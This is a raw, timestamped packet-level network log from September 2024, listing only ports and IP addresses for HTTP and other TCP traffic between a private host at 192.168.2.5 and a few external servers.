Sep 27, 2024 04:21:16.903191090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.903198004 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.903228045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.914995909 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.915024042 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.915036917 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.915047884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.915054083 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.915066004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.915077925 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.915086985 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.915091038 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.915110111 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.915153980 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.928858995 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.928885937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.928900003 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.928913116 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.928911924 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.928925991 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.928926945 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.928939104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.928951025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.928953886 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.928961992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.928980112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.928991079 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.928993940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929003954 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929006100 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929017067 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929028988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929038048 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929042101 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929065943 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929075956 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929094076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929105997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929116964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929130077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929135084 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929158926 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929167032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929184914 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929198980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929210901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929212093 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929233074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929238081 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929263115 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929269075 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929281950 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929290056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929307938 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929318905 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929361105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929373980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929384947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929395914 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929404974 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929423094 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929442883 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929481983 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929493904 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929505110 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.929524899 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.929537058 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.940718889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940732956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940746069 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940757990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940776110 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940788031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940798998 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940802097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.940810919 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940823078 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.940829039 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940843105 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940845013 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.940854073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940855980 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.940865993 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940885067 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940895081 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.940897942 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940927982 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.940938950 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940948009 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.940948963 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.940980911 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.940992117 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.942019939 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942048073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942059040 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942075968 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.942078114 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942090988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.942090988 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942105055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942127943 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.942154884 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.942189932 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942202091 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942213058 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942229033 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.942255020 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.942320108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942332983 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942344904 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942354918 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942367077 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942389965 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.942425013 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942425966 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.942439079 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942450047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942461014 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942465067 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.942472935 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942491055 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.942514896 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.942521095 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942533970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942545891 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.942558050 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.942580938 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.943166971 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943176985 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943186998 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943192005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943212986 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943221092 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.943223953 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943237066 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943248987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943259954 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.943281889 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.943304062 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943317890 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943329096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943341017 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.943341970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943356037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943382025 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.943412066 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.943424940 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943437099 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943447113 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943464994 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.943480968 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943491936 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943494081 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.943506956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943517923 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.943543911 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.943577051 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943588018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943598986 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943613052 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.943636894 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.943650007 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943656921 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.943662882 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.943691015 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.943706989 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.944036961 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.944050074 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.944061995 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.944080114 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.944097042 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.944097042 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.944109917 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.944123983 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.944133997 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.944163084 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.944199085 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.944210052 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.944246054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.944248915 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.944257021 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.944268942 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.944279909 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.944282055 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.944308996 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.944314003 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.944327116 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.944338083 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.944356918 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.944372892 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.944617987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.944655895 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.948415995 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.948446035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.948457003 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.948470116 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.948487043 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.948504925 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.948513985 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.948524952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.948537111 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.948548079 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.948549032 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.948565006 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.948587894 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.948587894 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.948617935 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.948627949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.948641062 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.948651075 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.948662043 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.948668957 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.948693037 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.948710918 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.948719025 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.948731899 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.948759079 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.948779106 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.949908018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.949919939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.949929953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.949955940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.949959993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.949971914 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.949980974 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.949985027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.950006962 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.950020075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.950155020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.950165987 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.950189114 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.950202942 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.951560974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.951571941 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.951581955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.951608896 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.951626062 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.951630116 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.951642036 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.951651096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.951663017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.951666117 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.951689005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.951698065 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.973409891 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.975636005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.975675106 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.975683928 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.975718975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.975718021 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.975732088 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.975744009 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.975747108 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.975756884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.975765944 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.975800037 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.975801945 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.975815058 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.975867033 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.975867033 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.975922108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.975934982 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.975965977 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.975975037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.975984097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.975987911 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.976000071 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.976012945 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.976027966 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.976044893 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.976093054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.976103067 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.976136923 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.976151943 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.977313995 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:16.982073069 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.985704899 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.985716105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.985730886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.985743046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.985753059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.985752106 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.985764980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.985776901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.985796928 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.985806942 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.985810041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.985824108 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.985850096 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.985877037 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.987864017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.987875938 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.987886906 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.987936020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.987948895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.987965107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.987974882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.987984896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.988085985 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.988400936 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.988519907 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.988562107 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.988562107 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.988573074 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.988604069 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.988627911 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.988646984 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.988657951 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.988687992 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.988687992 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.989418030 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.989593983 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.989636898 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.989636898 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.989681005 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.989763975 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.989774942 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.989788055 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:16.989794016 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.989794016 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.989835978 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.989835978 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:16.989869118 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.989878893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.989887953 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.989897966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.989907980 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.989918947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.989918947 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.989929914 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.989938021 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.989972115 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.990655899 CEST	80	49722	185.215.113.17	192.168.2.5
